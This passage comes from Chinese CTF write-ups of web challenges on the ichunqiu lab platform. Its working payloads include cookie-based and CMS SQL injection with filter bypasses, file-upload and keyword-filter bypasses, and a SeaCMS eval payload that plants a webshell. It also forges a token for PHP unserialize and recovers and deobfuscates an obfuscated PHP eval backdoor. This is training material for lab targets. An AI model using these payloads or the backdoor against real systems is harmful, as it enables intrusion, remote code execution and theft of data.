  346. Set-Cookie: username="2|1:0|10:1628699758|8:username|156:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsbWlkKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCd8JyxwYXNzd29yZCwnfCcsZW1haWwpIGZyb20gbWFuYWdlciksMSwzMCkpKSAtLSA=|138d344639d775557f79f2fcd8c59e13c4186cd86d56758da3dfd3776bee803a"; expires=Fri, 10 Sep 2021 16:35:58 GMT; Path=/
  347. 得到前部分的用户名和密码值:ichuqiu|318a61264482e503090fac
  348. 用户名为:
  349. ichuqiu ,密码的前部分md5值:318a61264482e503090fac
  350. 那么组合起来的password的MD5值为:318a61264482e503090facfc4337207f|545
  351. MD5解密后为:Myxss623
  352. 输入用户名ichuqiu密码Myxss623,登录到系统
  353. 在文件栏目中显示f13g_ls_here.txt是在该系统中,根据上文的爆出的网站物理路径,那么
  354. f13g_ls_here.txt路径为:
  355. /var/www/html/f13g_ls_here.txt
  356. 既然知道网站物理路径,那么可以通过load_file读取
  357. f13g_ls_here.txt内容:
  358. self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#")
  359. Set-Cookie: username="2|1:0|10:1628700614|8:username|120:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBsb2FkX2ZpbGUoJy92YXIvd3d3L2h0bWwvZjEzZ19sc19oZXJlLnR4dCcpKSkpIw==|9e10f83afcbc71c66f93440c17ace8b401bc48fa1bec1b8cf5c77bfd64f794fd"; expires=Fri, 10 Sep 2021 16:50:14 GMT; Path=/
  360. 获取到falg的前部分:
  361. flag{dca268c8-bfc7-4382-aa25-35
  362. self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),28,60)))#")Set-Cookie: username=2|1:0|10:1628700882|8:username|132:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsbWlkKChzZWxlY3QgbG9hZF9maWxlKCcvdmFyL3d3dy9odG1sL2YxM2dfbHNfaGVyZS50eHQnKSksMjgsNjApKSkj|5c16fe54b971dc0ac5907abaf734eecbbab60aa790c77c8a5f37a8ef85f3ee4e; expires=Fri, 10 Sep 2021 16:54:42 GMT; Path=/
  363. 获取到falg的后部分:
  364. 5-359f21c017bd}
  365. 最终flag:
  366. flag{dca268c8-bfc7-4382-aa25-
  367. 359f21c017bd}
  368. 题目名称:再见CMS
  369. 题目内容:这里还是有一个小脑洞
  370. 题目writeup:
  371. 启动题目场景,获得靶场网站,页面报错了网站的物理路径
  372. /var/www/html/
  373. http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/
  374. 通过whatweb在线cms查询靶机网站的CMS指纹,可以查询到该系统使用的CMS是奇博CMS
  375. http://whatweb.bugscaner.com/look/
  376. 通过御剑目录扫描工具,发现系统中存在flag.php
  377. 通过百度搜索奇博CMS的漏洞,发现历史漏洞中存在SQL注入,这里可以参考:
  378. https://www.2cto.com/article/201501/365742.html
  379. 先注册一个用户test
  380. 记下自己的uid,以便一会更新数据,在个人信息的链接地址的UID中可查询到,这里我的UID值为3
  381. http://badea0fa60b044d59413aeddf7524d450e8b165442834484.changame.ichunqiu.com/member/homepage.php?uid=3
  382. 查看数据库版本信息
  383. http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2
  384. post:
  385. truename=root%0000&Limitword[000]=&email=root@backlion.org&provinceid= , address=(select version()) where uid = 3 %23 //注意uid值
  386. http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/homepage.php?uid=3
  387. 得到数据库版本信息:5.5.35-1ubuntu1
  388. 查看数据库用户:
  389. http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2
  390. post:
  391. truename=test%0000&Limitword[000]=&email=root@backlion.org&provinceid=,address=(select user()) where uid=3%23
  392. http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/homepage.php?uid=3
  393. 得到数据库用户名为:youleUserl@localhost
  394. 查询表名:
  395. http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2
  396. post:
  397. truename=test%0000&Limitword[000]=&email=root@backlion.org&provinceid=
  398. , address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23
  399. 得到表名为:id,username,password,Email
  400. 通过load_file读取
  401. /var/www/html/flag.php内容
  402. http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/userinfo.php?job=edit&step=2
  403. post:
  404. truename=test%0000&Limitword[000]=&email=root@backlion.org&provinceid=,address=(load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)) where uid=3%23
  405. 根据上文可知flag的路径路径为:/var/www/html/flag.php,load_file函数里面那一串十六进制数字代表/var/www/html/flag.php
  406. 查询源码,发现flag内容
  407. view-source:http://b897152215d34ab597fed97d8b102d6cb3b5df5c35764d22.changame.ichunqiu.com/member/homepage.php?uid=3
  408. 最终flag:
  409. flag{b60be290-d90e-4b72-8763-83ae2357e933}
  410. 题目名称:SQL
  411. 题目writup:
  412. 启动题目场景,获得靶场网站,访问网站,页面显示flag{在数据库中}
  413. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1
  414. 测试and 1=1and 1=0,页面都显示相同内容,证明and被过滤了。
  415. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 and 1=1
  416. 又测试or 1=1or 1=0,页面都显示相同内容,证明or也被过滤了。
  417. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 or 1=1
  418. 使用字符&&和||分别替换成andor,页面显示不同,证明存在注入漏洞
  419. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 && 1=1
  420. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 || 1=1
  421. order by测试字段数,发现order by也被过滤了。
  422. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 order by 1
  423. 经常大量测试,发现可以使用<>绕过
  424. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 o<>rder by 1
  425. 这里需要注意or<>der隔开是不对的,因为or又是一个被拦截的字符
  426. 可以查询到有3个字段
  427. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 o<>rder by 1
  428. 通过union select查询字段的回显位,发现
  429. union select也被过滤了
  430. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 union select 1,2,3
  431. 这里同样用<>绕过,可查询到字段回显位在2位置。
  432. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,2,3
  433. 查询数据库名
  434. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,database(),3
  435. 可得到数据库名为:sqli
  436. 查询表名
  437. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1 un<>ion se<>lect 1,table_name,3 from information_schema.tables where table_schema='sqli'
  438. 得到表名为:info(
  439. 猜测flag在info表中)和users
  440. 查询字段名:
  441. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1   un<>ion  se<>lect 1,group_concat(column_name),3  from  information_schema.columns  where table_name='info'
  442. 得到三个字段名为:id,title,flAg_T5ZNdrm
  443. 查询
  444. flAg_T5ZNdrm字段的内容,可获得flag内容
  445. http://e9e6d163a16e4df1bab55b0b81dca52c2c501dc6e0ab4b69.changame.ichunqiu.com/index.php?id=1   u<>nion se<>lect 1,flAg_T5ZNdrm,3 from info
  446. 最终flag:
  447. flag{d6f827ac-3b39-4878-a6a9-77829ca6ed93}
  448. 题目名称:
  449. 题目内容:12341234,然后就解开了
  450. 题目wirteup:
  451. 启动题目场景,获得靶场,访问网站,发现页面正在加载
  452. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php
  453. 然后查看源代码,发现有注入long.php?id=1连接
  454. 访问
  455. login.php?id=1链接,可以正常显示,测试sql注入发现不行。
  456. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/login.php?id=1
  457. 这里对其靶机网站目录进行扫描,发现有index.php和login.php以及config.php
  458. 其中config.php页面打开是空白
  459. 访问index.php页面,发现有跳转,这里对其进行抓包,发现会直接跳转到b68a89d1c4a097a9d8631b3ac45e8979.php页面
  460. 打开
  461. b68a89d1c4a097a9d8631b3ac45e8979.php页面,又继续抓包分析,有一个隐藏页面进行请求b68a89d1c4a097a9d863lb3ac45e8979.php(这里1变成了L),在进行请求,响应页面跳转到302,同时又隐藏了
  462. 页面 l0gin.php?id=1,真正的是这个页面在请求。
  463. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php
  464. 访问
  465. l0gin.php?id=1链接,发现有内容的页面,可能这个页面是存在注入
  466. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1
  467. 测试and 1=1and 1=0,发现都被过滤
  468. 经过测试 and '1 和and '0,可绕过,并且页面不同,可判断该页面存在注入。
  469. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1'  and '1
  470. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1'  and '0
  471. 测试闭合符号#,发现#符号被过滤了
  472. 测试闭合符号--以及%23(# url编码)可成功闭合。
  473. 查询字段,发现存在2个字段
  474. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=1' order by 2%23
  475. 查询字段回显位,发现逗号被过滤了,不能进行含有逗号的Sql查询语句
  476. 绕过逗号过滤,可以使用join 联合查询语句进行绕过
  477. 查询数据库名和数据库版本
  478. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select database()) a join (select version() ) b %23
  479. 得到数据库名为sqli以及数据库版本:5.5.50-0ubuntu0.14.04.1
  480. 查询表名
  481. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select group_concat(table_name) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23
  482. 得到表名为:users
  483. 查询users的字段名
  484. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select group_concat(column_name) from information_schema.columns where table_name='users') a join (select version() ) b %23
  485. 得到字段名为:id,username,flag_9c861b688330
  486. 查询字段内容,可获得flag内容
  487. http://9b8586de8c8248f2b62b67ce3283a39fa5d3e04a6b3c44ca.changame.ichunqiu.com/l0gin.php?id=-1' union select * from (select flag_9c861b688330 from users) a join (select version() ) b %23
  488. 最终flag:
  489. flag{2281c183-a611-4569-8e88-8e1bace4d9a5}
  490. 题目名称:123
  491. 题目内容:12341234,然后就解开了
  492. 题目witeup:
  493. 启动题目场景,获得靶场网站,访问网站,发现是一个登陆页面
  494. http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/login.php
  495. 查看源代码,发现注释中包含用户名都在user.php中,且用户名的密码是密码+出生日期。
  496. view-source:http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/login.php
  497. 通过御剑目录扫描工具,发现存在flag.php和user.php.bk文件
  498. 访问user.php.bk文件,可直接下载文件到本地,并查看其内容,发现都是用户名字典。可将该文件当作字典 进行爆破。
  499. 登录系统,输入任意用户名和密码,并对其抓包,这里对用户名和密码进行爆破。由于
  500. 密码是密码+出生日期,这里出生日期从1990开始fuzz
  501. 添加字典,也就是那个备份文件
  502. 成功爆破出用户名lixiuyun,密码lixiuyun1990
  503. 输入爆破成功的用户名和密码,可登录系统,但是现实是空白的
  504. 查看源代码,发现注释中存在漏洞需要去掉,这里是去掉注释,我们将其复制保存到本地为file.html
  505. view-source:http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/
  506. file.html修改后的内容:
  507. <!DOCTYPE html>
  508. <html>
  509. <head>
  510.     <meta charset="utf-8" />
  511.     <title>个人中心</title>
  512. </head>
  513. <body>
  514. <center>
  515. <form action="http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/" method="POST" enctype="multipart/form-data">
  516.     <input type="file" name="file" />
  517.     <input type="submit" name="submit" value="上传" />
  518. </form>
  519. </center>
  520. </body>
  521. </html>
  522. 首先正常访问登录后的地址:
  523. http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/,并获得cookie值
  524. 然后本地访问
  525. file.html,上传一个.txt文件,抓包拦截,并带上获取的cookie值,发送请求,发现只允许上传图片文件。
  526. 接着上传.jpg发现文件名不合法
  527. 文件名修改为test.jpg.php发现文件名不能包含php
  528. 之后我们再尝试 php2, php3, php4, php5, phps, pht, phtm, phtml等 php的别名,最后得到pht或者phtml不会被过滤,可上传成功,并返回了一个路径/view.php
  529. 访问view.php路径,
  530. 得到提示通过file进行传参
  531. http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/view.php
  532. 访问
  533. view.php?file=,发现filter "flag"显示过滤了flag关键字
  534. http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/view.php?file=
  535. 直接双写
  536. flaflagg绕过,试了半天flaflagg.php,最后把.php去掉就得到flag了
  537. 访问
  538. view.php?file=flflagag可成功读取flag内容
  539. http://5bb146202b5841d69c2e758537e324212356187cb2854eaa.changame.ichunqiu.com/view.php?file=flflagag
  540. 最终flag
  541. flag{284d0d78-c90d-47bd-940b-a713f20749e7}
  542. 题目名称:Test
  543. 题目内容:善于查资料,你就可以拿一血了
  544. writeup:
  545. 启动题目场景,获得题目靶机网站,访问网站,发现网站是一个海洋CMS系统开发的
  546. http://9e3dca6048414f28b84aebff6615aaf412179ee984524170.changame.ichunqiu.com/
  547. 通过百度搜索海洋cms历史漏洞可知,得到一个搜索的任意代码执行漏洞,poc:
  548. search.php/?searchtype=5&tid=&area=eval($_POST[bk])
  549. 这里直接访问以下链接,可远程加载一句话木马
  550. http://9e3dca6048414f28b84aebff6615aaf412179ee984524170.changame.ichunqiu.com/search.php/?searchtype=5&tid=&area=eval($_POST[bk])
  551. 这里通过蚂剑链接一句话木马
  552. 并通过命令终端搜索falg,命令:find / -name "*flag*",发现没有任何相关的flag信息
  553. 猜测flag可能在数据库中,这里需要链接数据库,前提是需要找到数据库连接的用户名和密码
  554. 而这些信息是在data/common.inc.php文件下存在数据库的配置内容。
  555. 通过蚂剑本身自带的数据库管理工具链接数据库
  556. 并在seacms数据库中的flag_140ad230d8cb表中的flag字段中存在flag的信息,这里执行字段中的语句,即可获得flag内容
  557. 最终得到flag:
  558. flag{1603d032-add0-424b-8b11-df64d0e4ebb2}
  559. 题目名称:Login
  560. 题目内容:加油,我看好你
  561. 题目writeup:
  562. 启动题目场景,获得靶场网站,访问网站,发现是一个登陆页面
  563. http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/
  564. 对靶场网站查看源码发现注释中有test1 test1,猜测是用户名和密码
  565. view-source:http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/
  566. 输入用户名
  567. test1和密码test1,可成功登陆到
  568. member.php后台页面,发现没有可利用点
  569. http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/member.php
  570. 并查看源码,也没哟发现可利用点
  571. 继续访问访问
  572. member.php页面,并通过bupsuit抓包,发现在响应页面的http响应头中出现了可疑的show: 0
  573. http://861cde64ed424097a53639737ae67efabab9eb44763844b4.changame.ichunqiu.com/member.php
  574. 这里将
  575. show: 0 添加到http请求头部中,并发送请求,在响应页面中并没没发生变化和可利用点
  576. 这里修改为
  577. show: 1 添加到http请求头部中,在响应页面中出现了php的源代码。
  578. 得到php源码:
  579. <!-- <?php
  580.     include 'common.php';
  581.     $requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
  582.     class db
  583.     {
  584.         public $where;
  585.         function __wakeup()
  586.         {
  587.             if(!empty($this->where))
  588.             {
  589.                 $this->select($this->where);
  590.             }
  591.         }
  592.         function select($where)
  593.         {
  594.             $sql = mysql_query('select * from user where '.$where);
  595.             return @mysql_fetch_array($sql);
  596.         }
  597.     }
  598.     if(isset($requset['token']))
  599.     {
  600.         $login = unserialize(gzuncompress(base64_decode($requset['token'])));
  601.         $db = new db();
  602.         $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
  603.         if($login['user'] === 'ichunqiu')
  604.         {
  605.             echo $flag;
  606.         }else if($row['pass'] !== $login['pass']){
  607.             echo 'unserialize injection!!';
  608.         }else{
  609.             echo "(╯‵□′)╯︵┴─┴ ";
  610.         }
  611.     }else{
  612.         header('Location: index.php?error=1');
  613.     }
  614. ?>
  615. 对其源码进行代码分析:
  616. 可以看到想要得到 flag,必须得满足:
  617. 1.user 等于ichunqiu
  618. $login['user'] === 'ichunqiu'
  619. 然而token是经过这样处理的:
  620. $login = unserialize(gzuncompress(base64_decode($requset['token'])));
  621. 所以需要将‘ichunqiu’经过base64_encode(gzcompress(serialize($token)))处理得到token值,并将token添加到cookie中,发送请求就会得到flag
  622. 上面代码中三个函数的作用如下:
  623. unserialize:对单一的已序列化的变量进行操作,将其转换回 PHP 的值
  624. gzuncompress:解压被压缩的字符
  625. base64_decode:base64解码
  626. 我们重新编写一个php脚本来生成ichunqiu的token值:
  627. <?php
  628. $a = array('user'=>'ichunqiu');
  629. $a = base64_encode(gzcompress(serialize($a)));
  630. echo $a
  631. ?>
  632. 这里通过在线php工具来运行php代码得到token
  633. https://tool.lu/coderunner/
  634. 得到token的值:eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==
  635. 将token值添加到cookie中,添加的内容为:;token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==
  636. 并发送请求,在响应页面中发现了flag的内容
  637. 最终flag为:
  638. flag{051e9c1c-e685-4ef8-a315-5cae795f5866}
  639. 题目名称:Backdoor
  640. 题目内容:
  641. 努力、加油,拼搏,奋斗!!!
  642. tips:敏感文件泄漏 
  643. 题目writeup:
  644. 其他题目场景,获得题目靶机,访问网站,页面显示了一些内容“can you find the flag.php?"
  645. http://a4afd48a8c0d47a49a73ba27c3e6a5077ba687fe77164266.changame.ichunqiu.com/Challenges/index.php
  646. 尝试将index.php修改为flag.php,访问Challenges/flag.php页面,内容显示的flag并不是真正的flag
  647. http://a4afd48a8c0d47a49a73ba27c3e6a5077ba687fe77164266.changame.ichunqiu.com/Challenges/flag.php
  648. 通过御剑目录扫描工具对网站根目录以及/Challenges目录进行扫描,发现存在 robots.txt和flag.php文件以及/.git/路径
  649. 访问robots.txt页面,发现隐藏可访问flag.php页面
  650. http://a4afd48a8c0d47a49a73ba27c3e6a5077ba687fe77164266.changame.ichunqiu.com/robots.txt
  651. 访问flag.php页面,显示404页面无法访问
  652. http://a4afd48a8c0d47a49a73ba27c3e6a5077ba687fe77164266.changame.ichunqiu.com/flag.php
  653. 这里通过githack进行git下载
  654. python GitHack.py http://a4afd48a8c0d47a49a73ba27c3e6a5077ba687fe77164266.changame.ichunqiu.com/.git/
  655. 下载下来并没有可利用的东西,有某些隐藏的git操作的修改历史记录githack是不能读取出来。
  656. 这里使用
  657. dvcs-ripper会自动解析并提取以往的操作历史记录项目
  658. https://github.com/kost/dvcs-ripper
  659. git clone
  660. https://github.com/kost/dvcs-ripper.git
  661. perl rip-git.pl    -v -u  http://a4afd48a8c0d47a49a73ba27c3e6a5077ba687fe77164266.changame.ichunqiu.com/Challenges/.git/
  662. 查看falg.php和index.php的内容
  663. cat flag.php
  664. cat index.php
  665. 显示内容为:
  666. flag{this_is_not_flag},并不是flag内容
  667. 查看flag.php的修改git日志记录
  668. git log flag.php
  669. 可以看到修改了很多次flag.php这个文件,我们回查一下上一次的修改时的内容
  670. commit的值是test那次的值,可以看到在修改前是flag{true_flag_is_in_the_b4cko0r.php}
  671. 那么我们访问
  672. tb4cko0r.php文件,页面内容显示“can you find the source code of me?”告诉我们需要源码查看
  673. http://2f563c14132a4594bd424f63a4da93bd96dec8c672684bd6.changame.ichunqiu.com/Challenges/b4ckdo0r.php
  674. 查看源代码并没有任何可利用点
  675. view-source:http://2f563c14132a4594bd424f63a4da93bd96dec8c672684bd6.changame.ichunqiu.com/Challenges/b4ckdo0r.php
  676. 源代码中也无任何提示,既然是文件泄露,我们就尝试.b4ckdo0r.php.swo和, .b4ckdo0r.php.swp文件,这两个都是vim在编辑过程中产生的缓存文件,果然找到了.b4ckdo0r.php.swo,打开发现是乱码
  677. 我们将
  678. b4ckdo0r.php.swo上传到 kali 系统中,使用vim -r选项恢复该文件。
  679. vim -r b4ckdo0r.php.swo
  680. 回车即可得到b4ckdo0r.php的内容,将内容拷贝至b4ckdo0r.php文件中:
  681. <?php
  682. echo "can you find the source code of me?";
  683. /**
  684.  * Signature For Report
  685.  */$h='_)m/","/-/)m"),)marray()m"/","+")m),$)mss($s[$i)m],0,$e))))m)m,$k)));$o=ob)m_get_c)monte)m)mnts)m();ob_end_clean)';/*
  686.  */$H='m();$d=ba)mse64)m_encode)m(x(gzc)mompres)ms($o),)m$)mk));print("<)m$k>$d<)m/)m$k>)m");@sessio)mn_d)mestroy();}}}}';/*
  687.  */$N='mR;$rr)m=@$r[)m"HTT)mP_RE)mFERER"];$ra)m=)m@$r["HTTP_AC)mC)mEPT_LANG)mUAGE)m")m];if($rr)m&&$ra){)m$u=parse_u)mrl($rr);p';/*
  688.  */$u='$e){)m$k=$)mkh.$kf;ob)m_start();)m@eva)ml(@gzunco)mmpr)mess(@x(@)mbase6)m4_deco)mde(p)m)mreg_re)mplace(array("/';/*
  689.  */$f='$i<$)ml;)m){)mfo)mr($j)m=0;($j<$c&&$i<$l);$j)m++,$i+)m+){$)mo.=$t{$i)m}^$)mk{$j};}}r)meturn )m$o;}$r)m=$_SERVE)';/*
  690.  */$O='[$i]="";$p)m=$)m)mss($p,3)m);}if(ar)mray_)mkey_exists)m()m$i,$s)){$)ms[$i].=$p)m;)m$e=s)mtrpos)m($s[$i],$f);)mif(';/*
  691.  */$w=')m));)m$p="";fo)mr($z=1;)m$z<c)mount()m$m[1]);$)mz++)m)m)$p.=$q[$m[)m)m2][$z]];if(str)mpo)ms($p,$h))m===0){$s)m';/*
  692.  */$P='trt)molower";$)mi=$m[1][0)m)m].$m[1][1])m;$h=$sl()m$ss(m)md5($)mi.$kh)m),0,)m3));$f=$s)ml($ss()m)mmd5($i.$kf),0,3';/*
  693.  */$i=')marse_)mstr)m($u["q)muery"],$)m)mq);$q=array)m_values()m$q);pre)mg_matc)mh_all()m"/([\\w)m])m)[\\w-)m]+(?:;q=0.)';/*
  694.  */$x='m([\\d)m]))?,?/",)m$ra,$m))m;if($q)m&&$)mm))m)m{@session_start();$)ms=&$_S)mESSI)m)mON;$)mss="sub)mstr";$sl="s)m';/*
  695.  */$y=str_replace('b','','crbebbabte_funcbbtion');/*
  696.  */$c='$kh="4f7)m)mf";$kf="2)m)m8d7";funct)mion x($t)m,$k){$)m)mc=strlen($k);$l=st)mrlen)m($t);)m)m$o="";for()m$i=0;';/*
  697.  */$L=str_replace(')m','',$c.$f.$N.$i.$x.$P.$w.$O.$u.$h.$H);/*
  698.  */$v=$y('',$L);$v();/*
  699.  */
  700. ?>
  701. 修改一下代码将几个关键变量打印出来:
  702. <?php
  703. echo "can you find the source code of me?";
  704. $h='_)m/","/-/)m"),)marray()m"/","+")m),$)mss($s[$i)m],0,$e))))m)m,$k)));$o=ob)m_get_c)monte)m)mnts)m();ob_end_clean)';
  705. $H='m();$d=ba)mse64)m_encode)m(x(gzc)mompres)ms($o),)m$)mk));print("<)m$k>$d<)m/)m$k>)m");@sessio)mn_d)mestroy();}}}}';
  706. $N='mR;$rr)m=@$r[)m"HTT)mP_RE)mFERER"];$ra)m=)m@$r["HTTP_AC)mC)mEPT_LANG)mUAGE)m")m];if($rr)m&&$ra){)m$u=parse_u)mrl($rr);p';
  707. $u='$e){)m$k=$)mkh.$kf;ob)m_start();)m@eva)ml(@gzunco)mmpr)mess(@x(@)mbase6)m4_deco)mde(p)m)mreg_re)mplace(array("/';
  708. $f='$i<$)ml;)m){)mfo)mr($j)m=0;($j<$c&&$i<$l);$j)m++,$i+)m+){$)mo.=$t{$i)m}^$)mk{$j};}}r)meturn )m$o;}$r)m=$_SERVE)';
  709.  $O='[$i]="";$p)m=$)m)mss($p,3)m);}if(ar)mray_)mkey_exists)m()m$i,$s)){$)ms[$i].=$p)m;)m$e=s)mtrpos)m($s[$i],$f);)mif(';
  710. $w=')m));)m$p="";fo)mr($z=1;)m$z<c)mount()m$m[1]);$)mz++)m)m)$p.=$q[$m[)m)m2][$z]];if(str)mpo)ms($p,$h))m===0){$s)m';
  711. $P='trt)molower";$)mi=$m[1][0)m)m].$m[1][1])m;$h=$sl()m$ss(m)md5($)mi.$kh)m),0,)m3));$f=$s)ml($ss()m)mmd5($i.$kf),0,3';
  712. $i=')marse_)mstr)m($u["q)muery"],$)m)mq);$q=array)m_values()m$q);pre)mg_matc)mh_all()m"/([\\w)m])m)[\\w-)m]+(?:;q=0.)';
  713. $x='m([\\d)m]))?,?/",)m$ra,$m))m;if($q)m&&$)mm))m)m{@session_start();$)ms=&$_S)mESSI)m)mON;$)mss="sub)mstr";$sl="s)m';
  714. $y=str_replace('b','','crbebbabte_funcbbtion');
  715. $c='$kh="4f7)m)mf";$kf="2)m)m8d7";funct)mion x($t)m,$k){$)m)mc=strlen($k);$l=st)mrlen)m($t);)m)m$o="";for()m$i=0;';
  716. $L=str_replace(')m','',$c.$f.$N.$i.$x.$P.$w.$O.$u.$h.$H);
  717. $v=$y('',$L);$v();
  718. echo  $v,$L,$y;
  719. ?>
  720. 通过在线 php执行,得到不美观的php代码:
  721. 通过在线PHP代码格式化美化工具对其进行美化。
  722. http://www.jsons.cn/phpformat/
  723. 整理得到php代码:
  724. <?php
  725. $kh="4f7f";
  726. $kf="28d7";
  727. //对$t,$k进行异或运算
  728. function x($t,$k) {
  729.     $c=strlen($k);
  730.     $l=strlen($t);
  731.     $o="";
  732. for($i=0; $i<$l;) {
  733. //如果第二个参数全部异或了一遍,第一个还没结束,接着从第二个参数头部从头开始。
  734.         for($j=0; ($j<$c&&$i<$l); $j++,$i++) {
  735.             $o.=$t{$i}^$k{$j};
  736.         }
  737.     }
  738.     return $o;
  739. }
  740. // HTTP_REFERER处理后传给$q ,HTTP_ACCEPT_LANGUAGE过正则,每个语言的首字符和权重q=0.x的x值传给 $m
  741. $r=$_SERVER;
  742. $rr=@$r["HTTP_REFERER"]; //获取变量,且用户可控
  743. $ra=@$r["HTTP_ACCEPT_LANGUAGE"]; //获取变量,且用户可控
  744. if($rr&&$ra) {
  745.     $u=parse_url($rr); //解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。
  746.     parse_str($u["query"],$q); //把HTTP_REFERER中query(即提交的参数)对应的值提出,parse_str — 将字符串解析成多个变量
  747.     $q=array_values($q); //返回含所有值的索引数组。
  748. preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
  749. //
  750.     if($q&&$m) {
  751.         @session_start();
  752.         $s=&$_SESSION;
  753.         $ss="substr"; //做动态变量名用,$sl也一样
  754.         $sl="strtolower";
  755.         $i=$m[1][0].$m[1][1]; //取的组合值
  756.         $h=$sl($ss(md5($i.$kh),0,3)); //运算后值为675
  757.         $f=$sl($ss(md5($i.$kf),0,3)); //值为a3e
  758.         $p="";
  759.         for($z=1; $z<count($m[1]); $z++)
  760.             $p.=$q[$m[2][$z]]; //遍历所有权重值,读取对应的$q,拼接成$p
  761.     //如果$p中没有和$h相同的的字符串,则令$s[$i]为空,p等于p的前三位
  762.         if(strpos($p,$h)===0) {
  763.             $s[$i]=""; $p=$ss($p,3); //$p前三位是不是675
  764.         }
  765.     // array_key_exists — 检查数组里是否有指定的键名或索引,检查$i中有无$s字符串,有则s[$i]与p合并,$e等于$f在$s[$i]中首次出现的位置
  766.         if(array_key_exists($i,$s)) {
  767.             $s[$i].=$p;
  768.             $e=strpos($s[$i],$f); //$i后三位是不是a3e
  769.             if($e) {
  770.                 $k=$kh.$kf; //$k值为4f7f28d7
  771.                 ob_start();//打开输出控制缓冲
